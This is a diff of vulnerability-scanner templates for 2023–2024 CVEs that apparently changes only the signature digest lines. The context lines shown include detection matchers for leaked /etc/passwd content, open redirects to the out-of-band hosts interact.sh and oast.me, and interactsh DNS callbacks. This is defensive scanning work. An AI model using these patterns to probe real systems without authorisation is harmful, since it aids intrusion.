--- a/http/cves/2023/CVE-2023-6379.yaml +++ b/http/cves/2023/CVE-2023-6379.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b71db177da91e5e6c5e897488cbdc0d42d62cd5a08eb0cf9118b75c657302b5d02201e724c6dc9389e19b0e1e7f1c0ef4302a6331009f3fc4ed69d27c5d4c6fef93b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205e05cf7f2f91cf532ffb6f807d60642917e9e6ec9d822a2e54cd2de74ae45ce3022034c3befcd7ef45e90974eca3405e19fa64eb34794b94d3229602d8f3c80e20b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6380.yaml b/http/cves/2023/CVE-2023-6380.yaml index 6f23bea096..3bd9c533af 100644 --- a/http/cves/2023/CVE-2023-6380.yaml +++ b/http/cves/2023/CVE-2023-6380.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022100a5a608b89ffe743993de0f02706ecec163b8896eedd5eddc7760c0b04d5ab0ab02207aceb79637f8deb9884da67bcb4a0670206654de1aa6dac32dc892f0f28d2309:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f8f67cf5ced5325f71a7df26c1365c6ef6de0e5bff9fb8bc27c5772ec9678ccb02202cc859db371c7dfd3a38c6266aeec5b8460678e5a0bc08479f333dca7163c770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6389.yaml b/http/cves/2023/CVE-2023-6389.yaml index 917e147152..cec769be7b 100644 --- a/http/cves/2023/CVE-2023-6389.yaml +++ b/http/cves/2023/CVE-2023-6389.yaml @@ -37,4 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' -# digest: 4a0a00473045022100c227bbaa90d02a8b9a508a44f888cc765c6a1454560b1517de91547f856b16df022006e4ae4b398be8b002c3d5d69184bc04a8181d0019c21f8ed05cf288b73b603c:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022069291b94181425caa4ab6312081887206d9106911c86385cb93dacc297d0b7fb022078696dd4ed775e8b5a8d9e5e93907812fd5645362152da68ae7aa6bcd89bf8a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6553.yaml b/http/cves/2023/CVE-2023-6553.yaml index ebae9ddafd..96dc4246a7 100644 --- a/http/cves/2023/CVE-2023-6553.yaml +++ b/http/cves/2023/CVE-2023-6553.yaml @@ -57,4 +57,4 @@ http: - 'status_code == 200' - '!contains(body, "Incorrect parameters")' condition: and -# digest: 4b0a00483046022100ddebbe709631857b161d91f48fcaad3cbcbcf64ac268f381b2fb06b62d443ca6022100978d207450ff4e3b1354ed0c4bd55f7f0618aeeac8be603ccce61db984c0e2cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220661c2d0bbd520881687d882ec68392a1b4550061945919523c2edcd6422ed8a702203bdd67f2fe7b6bca62f3608e55342cd081f8ac2dc9d4a54ceb5d82b40d267e51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6567.yaml b/http/cves/2023/CVE-2023-6567.yaml index 5a9ad442ae..df8efb7dc9 100644 --- a/http/cves/2023/CVE-2023-6567.yaml +++ b/http/cves/2023/CVE-2023-6567.yaml @@ -44,4 +44,4 @@ http: - 'contains_all(header, "lp_session_guest=", "application/json")' - 'contains_all(body, "status\":\"success", "No courses were found")' condition: and -# digest: 4a0a0047304502210085b3b5a77e87f606925cb203290c351bfd67682723d02555577f4197749a33d002203afee6ee56b4b406278f2cecc726ba148b39886cff4d5476eb0cc3775c15b319:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022049bde3d0466108b9b6bedde41f7b02672e5105dc2715b1e47e00050d940308960220202e7919355ec36aa5f1df03661c9e36bfd63b962ba0df1e1f749ae5b6e5bdea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6623.yaml b/http/cves/2023/CVE-2023-6623.yaml index f8a50523ce..5617af765f 100644 --- a/http/cves/2023/CVE-2023-6623.yaml +++ b/http/cves/2023/CVE-2023-6623.yaml @@ -46,4 +46,4 @@ http: - "regex('root:.*:0:0:', body_1)" - 'contains(body_2, "Essential Blocks – Page")' condition: and -# digest: 4a0a0047304502207d8c7609094a1fcc45e09dc8ebe35c75ac8395a88ae445e167670d8170179e66022100d155f3979980076224bb71384247a853423ac98c0fe216581f8f55343ee217a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022074608b993f54ad1c4a650efb6e94f7060a6eb7bbcb1b6a06d126af9f727eece302203c483f813b2de38dde9f6f4de6ae15eaaa6e18e056c051c0db9822342f974444:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6634.yaml b/http/cves/2023/CVE-2023-6634.yaml index 3ca99e2e70..39f79c8112 100644 --- a/http/cves/2023/CVE-2023-6634.yaml +++ b/http/cves/2023/CVE-2023-6634.yaml @@ -60,4 +60,4 @@ http: - "contains(body_1, '<pre>{{randstr}}</pre>') " - "status_code == 200" condition: and -# digest: 4a0a00473045022100c9994c66149f4a5bf4f57eb82447c380b3f1676950538da499834183bc73a10d022003e36af3fb7e71968c37a7a3cbde7b2fd89d97f0bc0dd4827b652838616db3ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fefee7738d7318b2a23319053598eb449feae8f7895068cc68e9024beb9349000220243e0e60f28515bca8e3f6574da036d920079e1edb28c9d922532c4ffe2dec33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6831.yaml b/http/cves/2023/CVE-2023-6831.yaml index c61efb18c2..34b6072580 100644 --- a/http/cves/2023/CVE-2023-6831.yaml +++ b/http/cves/2023/CVE-2023-6831.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 500 -# digest: 4a0a004730450220562372b84037c253793b1361644b96eee1ccba93418d5cd737d3aaa998b804ec0221008a4a73e79fa7039b979a9897d901eef7dc19a6503ac32ff803a078f3c61485f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206ddb723e7f69860d46bf9f0d3eb35ef2480886f01c5ca13e1a0d8575549d5120022100bd216b56f72cce7e547ed8ebf3dcbd2e3ec8ae994eccca17465f3315741f4e29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6875.yaml b/http/cves/2023/CVE-2023-6875.yaml index 112b394224..d12431188f 100644 --- a/http/cves/2023/CVE-2023-6875.yaml +++ b/http/cves/2023/CVE-2023-6875.yaml @@ -66,4 +66,4 @@ http: - 'contains_all(body_2, "success\":true,", "{\"fcm_token\":\"{{fcm_token}}")' - 'contains_all(body_3, "true,\"data\":", "access_token=")' condition: and -# digest: 4a0a00473045022100df1311e0648c5c0c2297cad9b5527b9c111d611cf4b9f990fdea564c1ff5c4cc02202ce1f58dc34dd57604eef2926b33b969069290c0f03ffabb7af0be0f90fea60c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022054ee2def0b29dd215b74e42c2b2fae960ec0297d5d2e8218b287ca21b198810802200d71bf6828498c33e1b0e6e7dfd452c17b144bffdb1857b383b8a82ff70521b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6895.yaml b/http/cves/2023/CVE-2023-6895.yaml index d235fb2d48..30725264c4 100644 --- a/http/cves/2023/CVE-2023-6895.yaml +++ b/http/cves/2023/CVE-2023-6895.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b5522ab583b393cf6a360b2e58dae29b4681cb2fefa1f6ad38518b6dc74c829c022013094391177663822a780dcd082911844f772129caea17c943068a4037e24e71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100873e667f79525849dce90cee9fef344f9cede1e176a67b4f6918f37d4a23e3b50220576cab131b3b6fe4305ffc0a3f677aeb1778b20ed6ea7df960fabb089bdedafa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6909.yaml b/http/cves/2023/CVE-2023-6909.yaml index 0a9d5b0090..f54123a4f1 100644 --- a/http/cves/2023/CVE-2023-6909.yaml +++ b/http/cves/2023/CVE-2023-6909.yaml @@ -96,4 +96,4 @@ http: json: - '.run.info.run_id' internal: true -# digest: 490a00463044022062e417739d10a0345e088ba046630f61c75a6fb7c2640786cae6d7fe70c113da0220798d1ffc7b82d974779f27319ed421eb30bafdb7d6a1dbc125edc69436bef5e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022052a30b6e907e294f038966261bdad72af7c17267badac02e788613b04753c2b1022066fc365a76fb0d47be05eaa43ae50f697ff46da97e01b7164ee6a67634a8f687:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6977.yaml b/http/cves/2023/CVE-2023-6977.yaml index ad82399438..5d6745fa14 100644 --- a/http/cves/2023/CVE-2023-6977.yaml +++ b/http/cves/2023/CVE-2023-6977.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205c8c97c275094e88344019f80ab5824b9d657171e092d085f48ff32a61c3bcf2022100e3ee293e0e93fe88e0838ff2ab71274a68e6cd4ffdf9bc9f50e58b9bd30a4b11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f0cc21ee7674483fa248cd37db375771b19a1d3946c54b714fe83507f3165b8d02200428fde4d64af3695a299151160bf01a3519aca37aef9bf090b6e554b0ae1bb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6989.yaml b/http/cves/2023/CVE-2023-6989.yaml index 802578849e..eae3fd1da0 100644 --- a/http/cves/2023/CVE-2023-6989.yaml +++ b/http/cves/2023/CVE-2023-6989.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204e4cce5ccdd9c3c04b71aa1cd58280c033c6855be762519af8ea28b91bf131ce022100e41638a64a0ddab0bd7492d519772ad577c9420c807c3f5c34cfc69d01b923c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210093c24d2fd1ae8419c9e8f9fd7a52f96cdd206a4cb9b12d3609925dc966ccccef022100e0ab5dea2fb436d6b86f9d3ab834a6191b1420a549be6df84c7658dde0c24928:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-7028.yaml b/http/cves/2023/CVE-2023-7028.yaml index 80f92e14eb..4482533320 100644 --- a/http/cves/2023/CVE-2023-7028.yaml +++ b/http/cves/2023/CVE-2023-7028.yaml @@ -73,4 +73,4 @@ http: - type: dsl dsl: - username -# digest: 4a0a004730450220463aa8f8060e3d37f8935e48c8c505f27a93a54e94298dfab55d23119670cb3c022100949c049141cf1a84318d7a48bddd617e314733ec8e6cabf27b140c8396816d9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203c8b9f3dd68d958f6e7fef77b3e41a0503d0ce5dbd5938e48b6aa5673740deb6022100a73edc9d9b3abab28c28d668940b630a29f8ab22eb57fc837c0a199d11949d37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml index 07766fd74e..33b6f5b735 100644 --- a/http/cves/2024/CVE-2024-0195.yaml +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -55,4 +55,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 4a0a004730450220745e8b365ef39550953f2e7c7ec479c97d618b53aca81aa2b4ca13122a21393e022100ca3f258bebf53fbde78835764d0418a8e96537a8c81731da03b8ef7429d65e6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220224fd0c2d3e7a5a8a342a552978cab6e0c092e96e5051acbcbc188195ddbaf79022100e343e64a1df88675ddee620ae422551478db8fb0bd0717f599875461b3674f4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0200.yaml b/http/cves/2024/CVE-2024-0200.yaml index c4ccc716c1..b2fa1f6f6a 100644 --- a/http/cves/2024/CVE-2024-0200.yaml +++ b/http/cves/2024/CVE-2024-0200.yaml @@ -140,4 +140,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 4b0a004830460221008cb530b7dece20ef5b28664e52e4b5123c761007f8a3021c46963b66706b95f8022100ba710c3a1d763987eb9872637d45f542155a84506b437d9e360f973235902443:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202af9825ce4c628dd737cd0ccc55a5e21eacfe2fe5bfd7774cd9beb496823ff1902200709cad5ee85816fd669fb420ec1ad81f9fc45674917637775df828d1d3c24c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0204.yaml b/http/cves/2024/CVE-2024-0204.yaml index e115c0cad5..3df53ddbe7 100644 --- a/http/cves/2024/CVE-2024-0204.yaml +++ b/http/cves/2024/CVE-2024-0204.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220581efe02eb9cd3ada112546fde3dc7479baecfc944f62b46161092c26a8ea386022100938435bdc92e8db29976fbb000eb51a136a70541574c87c832a83b2b1f87ced1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cb7b55a7105c762dc0cfc768f943c35b9f8e8dd12e835bdf1d02a7dad92f19ce022100f3f3f81a40d97c815e7fd00dbf28682b4b29f358abbc6ef73a1cd30ae198a26a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0235.yaml b/http/cves/2024/CVE-2024-0235.yaml index 9cc96e8257..5babf693a2 100644 --- a/http/cves/2024/CVE-2024-0235.yaml +++ b/http/cves/2024/CVE-2024-0235.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dd24c1d6e69e4b09cfdd6e18d844c71fecf98df6be105ce2f3645b85146d64be0221009bd6cb83542aa43265c7f18b56ac9f07610b6cee11eafbf574dfb9dc05e30d88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203776f70607308dc5842148f721807cddd437743f37d42520d8d3d7507ccb14fe0221008718d14a88f39edcfc1dc90a1b399da2330eb4d026aba06ae521a1be3ef07338:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0305.yaml b/http/cves/2024/CVE-2024-0305.yaml index bc5222aad8..1a1258ea1b 100644 --- a/http/cves/2024/CVE-2024-0305.yaml +++ b/http/cves/2024/CVE-2024-0305.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022015e3b88f751e5eecf33a42035bdf0113bdc40dab4f2bb7b7585a58b07a2a3f8c02205a2cf5822cfe9758202ab4fc426fb99e6e702ab31c6ebd5c14e720ae82d26a02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d1f25d83c4cc8faf1fb67b3d457d7836d489e5d39a804474ab40d527613a1cf402206d8825a981c77b5dbd4b1e8b46aa5223cdc770f4699c9593bf2abfae8875d691:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0337.yaml b/http/cves/2024/CVE-2024-0337.yaml index 285109fd1a..639c6a0675 100644 --- a/http/cves/2024/CVE-2024-0337.yaml +++ b/http/cves/2024/CVE-2024-0337.yaml @@ -31,4 +31,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' -# digest: 4a0a00473045022100b62074d8f68fb2cd5bca314322a65516a6df198a8b84351098fe13babf2af5680220740b91fd3dc325e68c28496b76f1c373dc916628237e0245cf337f693ca65fb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220181582ac93b72f27e977d2061f18ff05e3b5df811283cea693e6f70459ab7fb90221008a49810c8b6636aaef8a8678a28ed5d5204efe8af7cdfd25e42fee1f0617dea0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0352.yaml b/http/cves/2024/CVE-2024-0352.yaml index 32c906a6af..b9f84832b2 100644 --- a/http/cves/2024/CVE-2024-0352.yaml +++ b/http/cves/2024/CVE-2024-0352.yaml @@ -62,4 +62,4 @@ http: part: body json: - ".data.url" -# digest: 4a0a00473045022100be04b8cac16a0577f0fc6b0022cf4994579f8d883c303f66f39ab4955412da3f02204f210d0cd8ce3c68975bcbc6d030680d926478b27dbc1781c253f4e0835ca650:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f918936fafffcf93421ce086207f2283925cd669ecc632d7ed2bc75094b855a802200fd6828f58d3fe1ed11a252d611b4b5a317e232fcc89bb3d80c103e17ea3ac4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0713.yaml b/http/cves/2024/CVE-2024-0713.yaml index 267c293698..614e47bf2b 100644 --- a/http/cves/2024/CVE-2024-0713.yaml +++ b/http/cves/2024/CVE-2024-0713.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201055181c903e98898674fdb23437eb0e90871b42745b5c0d4aad9e3129dddf11022100c04264cde1575aff618e4b83359fa39d048cb64fbc9c3adbced30e325768c289:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207865526b425259e07024fac870f35786a61a851cc80adc31f50af1315dbb70f5022077b7fcab0b340df120fd03a87976f7c79ae545de9b114bbeb89ac0d7fa77b5d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1021.yaml b/http/cves/2024/CVE-2024-1021.yaml index 3bc25fe99d..fd8249780b 100644 --- a/http/cves/2024/CVE-2024-1021.yaml +++ b/http/cves/2024/CVE-2024-1021.yaml @@ -46,4 +46,4 @@ http: - '!contains(body_1, "<h1> Interactsh Server </h1>")' - 'status_code_2 == 200' condition: and -# digest: 4a0a0047304502210083066599f18b2c54a0a9076795f7d22b1ca8d8fad2c8f03a3147ec730c002e9702203386c976a8e99262651e52994ce6d95c2f342a0cc4e8518139df96275c9a03f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c8dcb630e55d93d987c9a3762240cb9645bcf34d01a16d7956fac27f0305b495022100b735b765090843b97037acb05a7df7d8fd2c276a622fba517fe63c67d3104f1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1071.yaml b/http/cves/2024/CVE-2024-1071.yaml index efac84fdae..1b2a26a019 100644 --- a/http/cves/2024/CVE-2024-1071.yaml +++ b/http/cves/2024/CVE-2024-1071.yaml @@ -61,4 +61,4 @@ http: regex: - '"nonce":"([0-9a-z]+)"' internal: true -# digest: 490a00463044022023025d307157dc2a97f59694d6703e6de5e5492820a9357d8a1a980e59010ca90220008b16687ffe30b37f8738816ab1e80fe8aacad0b5f8de07ac423c85f7146f36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d2df4a7cad579bad009987ee9d6530c566d41945f49f28209893750e5911d455022067f89316e7566747df1c9f3ace0ac1a3ff52891d51379e57cc750c506ad754ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1208.yaml b/http/cves/2024/CVE-2024-1208.yaml index d06d7ed936..ea22b280ea 100644 --- a/http/cves/2024/CVE-2024-1208.yaml +++ b/http/cves/2024/CVE-2024-1208.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008abc475f7d30df3a6b98733b219dede7a70dfd1c97e3c2928672e8574552af7f022100a8e1793227c1e4bbb6a2b10ceca86cd1c109f5bd43330f357f2a4a10c9c78184:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009ad10d599ee3e30855b6762e19b28a2ac7da9bc0c7706434f624700a515dfba5022100afa860c027433f125b3f43f5789fa421b42e30da5ae52855f7a826f598ce5e98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1209.yaml b/http/cves/2024/CVE-2024-1209.yaml index 46e4d49b37..d0eb06f584 100644 --- a/http/cves/2024/CVE-2024-1209.yaml +++ b/http/cves/2024/CVE-2024-1209.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220363799e96bf26f65aefc0de03e8fa5d4be7862d3bc87f1bd33ee217855e3541202204c371666413ff5962a77c1ef4ecfc419b2a00dec6859fc524b10dab24d46bc5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204ae0b7aaa5c2cc54e8f7f4f2d00c4fb4bde976c89042d6175ec87fd9ef4a99ed022065ef648949d50b42a6621c029c88b279dc5f56f8ff5358185bab08a0937cb7e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1210.yaml b/http/cves/2024/CVE-2024-1210.yaml index 77adf5117c..c5c9a101f9 100644 --- a/http/cves/2024/CVE-2024-1210.yaml +++ b/http/cves/2024/CVE-2024-1210.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204f99f7431a131299ee2561e6fb7bcc25f330b25ad1e06dd0679ced69336dc71c022100df619ceeef6954dc1b47304d723b9bfad50e69af08876232c9ef3159f9638438:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c80859e9500c040651b395581d3b3731a53c9bff54b209866749256a3b9f6411022100d846a7b23ffc3a21709bc5afc49c12f15cc45dad46cd5b8f257151c49916282d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1561.yaml b/http/cves/2024/CVE-2024-1561.yaml index 890f315b5a..8efbfcfd40 100644 --- a/http/cves/2024/CVE-2024-1561.yaml +++ b/http/cves/2024/CVE-2024-1561.yaml @@ -71,4 +71,4 @@ http: - regex('root:.*:0:0:', body) - 'contains(header, "text/plain")' condition: and -# digest: 490a004630440220321f22e77b20acc61afa7b5cbf1f465becdb09178d7c23342a1d1be0a11c843502205a9d96fc3f2429ce7f2566dce2a289b2ff6529266cee50a0d24bd60336562f19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220228b8f9ed4c8b48faa786cd1c48413831ef219341e029831e13f0a25f92be8a902204ff8d692224fa018c063b78b72507ddf2e92f2a750fd3b5cd0c01bc2f32a762f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1709.yaml b/http/cves/2024/CVE-2024-1709.yaml index 0b166ee532..c74b6d0427 100644 --- a/http/cves/2024/CVE-2024-1709.yaml +++ b/http/cves/2024/CVE-2024-1709.yaml @@ -56,4 +56,4 @@ http: part: header kval: - Server -# digest: 4b0a00483046022100df42d248b92130b0997228abe4ff00197ca95319ec494fcb457e36f99947b38b022100f14f62eb21d2dc5ebb6f7d9b2e3df0501572ace6e67a5cad42153418c3fae0b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200d59499217f5fa1b23e2853d0fbf6bf7ec8cf454bec8e03f9b282ba0454666c90220022fd485c85c7ae0d7d2c1d61f0137ac708e64e7088329ddd5ee7b09f2914326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-20767.yaml b/http/cves/2024/CVE-2024-20767.yaml index 4b386cd7ef..ec6496cc66 100644 --- a/http/cves/2024/CVE-2024-20767.yaml +++ b/http/cves/2024/CVE-2024-20767.yaml @@ -53,4 +53,4 @@ http: regex: - "<var name='uuid'><string>(.*)</string>" internal: true -# digest: 4b0a00483046022100ae51132a490d9b1610ee3525362809c3c77ac5399cb74bd5070785b43cc2441e0221008bc1d323f198a3c3c0e615caceb32d4f55678113c27be537aeb55e5a329acb35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e6a9a13cc692e12629ce4b557e8a9cdaab2f6b3df9155e2bb4f5cac00241469b0220351a6751dda75fd857b8ac90f6cdca44f5853c3c3019070572245e97c7aec3eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21644.yaml b/http/cves/2024/CVE-2024-21644.yaml index 99bff48091..86bd3dc8a4 100644 --- a/http/cves/2024/CVE-2024-21644.yaml +++ b/http/cves/2024/CVE-2024-21644.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f302e5b4df6df2065372cf020665c535b9de6c08a15a2c78c955109b9ab285c4022100e42e3025cf3b53f97264dab0c19a74e110d62d5fdcd038986cc4c6c3408f2004:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dbc462e6a4ec19c1e7ab2f6b6429fe16b06358c3fa73863c3e32131a6e13412e022100e7b446c295e5f3dbb670aff61f094db8306984f320e18dc9ddbf51a996c61905:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21645.yaml b/http/cves/2024/CVE-2024-21645.yaml index 40f8b5da22..0250d430b5 100644 --- a/http/cves/2024/CVE-2024-21645.yaml +++ b/http/cves/2024/CVE-2024-21645.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022021729634e85ce3cca856b22c561467945ed9ed3bf435485b3256804092dc4ae90220233d82fed78afeb8e07ab2442277d3b206acbd3f928ca900fed17ce0ba29b641:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220216ceedbf4e4d3fc297fe0289353b2e737908320f01c52ee6744165ec80d0a250220380aec9a972d971780f7b55d7c2aedc82995efa4ff37219641782625ac06a453:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21683.yaml b/http/cves/2024/CVE-2024-21683.yaml index ce5d967f29..53c6de5d31 100644 --- a/http/cves/2024/CVE-2024-21683.yaml +++ b/http/cves/2024/CVE-2024-21683.yaml @@ -68,4 +68,4 @@ http: - contains(interactsh_protocol, 'dns') - contains(body_3, "confluence") condition: and -# digest: 490a0046304402205e17e1f46f7d3be0e24a6719947291bcd7ee29f12eff3302d5caac3b06b960e00220762f9672204a4cd09ae9f6af85a8b7ec5c363be85a365d69f5416dc5d6582a80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d80092d262e68d1570c5fc81be4a315e236f16b2dbdf9a391d7b75c0d2fb7d170220293a0a26dcaa902e80096361b702205e20ec2bf87f23dd7ee911fb1ba767a77c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21887.yaml b/http/cves/2024/CVE-2024-21887.yaml index 2b72f878a0..5efad6cb3e 100644 --- a/http/cves/2024/CVE-2024-21887.yaml +++ b/http/cves/2024/CVE-2024-21887.yaml @@ -52,4 +52,4 @@ http: - '"result":' - '"message":' condition: and -# digest: 4a0a004730450221008b11fb4caa72e93adcd3d6b4881baab60260caf734506dbeee298619d8a45db302205572b212a5aed50300f75693d3e4a74f34ee40ed420c6a4f2f83ded92f8699b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a2d7a9784797d3dc50639c2b76b4d29f645b1157608bb1816a0a6602cba6f380022100ee0ba2172fa6cc5ae3c7c1ebc35e92d4d9fed793450426258df98bb059c1025f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21893.yaml b/http/cves/2024/CVE-2024-21893.yaml index 86e3acadc2..f111b9e3e3 100644 --- a/http/cves/2024/CVE-2024-21893.yaml +++ b/http/cves/2024/CVE-2024-21893.yaml @@ -50,4 +50,4 @@ http: - '/dana-na/' - 'WriteCSS' condition: and -# digest: 4b0a00483046022100a797d4c0fc87aff6583e71171c6d273e3f085bb60230c59a4a66e25d192d82d5022100a7a07c9ff12e69f386f9e2c80c1c134ea79bb8969038a584f32354d05de18618:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022027b9e6e74722d01d9812d29c2aeda9f8d8e2891891bacef19090cf225e7b43bd0220558c9cd77e216c8f6655742290f05d256049d8a020e84039644f22f3a4aa6601:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-22024.yaml b/http/cves/2024/CVE-2024-22024.yaml index 75c51f20ac..c64bac7317 100644 --- a/http/cves/2024/CVE-2024-22024.yaml +++ b/http/cves/2024/CVE-2024-22024.yaml @@ -47,4 +47,4 @@ http: - '/dana-na/' - 'WriteCSS' condition: and -# digest: 4b0a00483046022100e9957e443991b0960713b78c4fe96492cf6b6d9c5d70a45a77c8946752f125d1022100aba7f397b618737db6ab5865122dac0d1eab63346e36dc40656a995e97cbb619:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 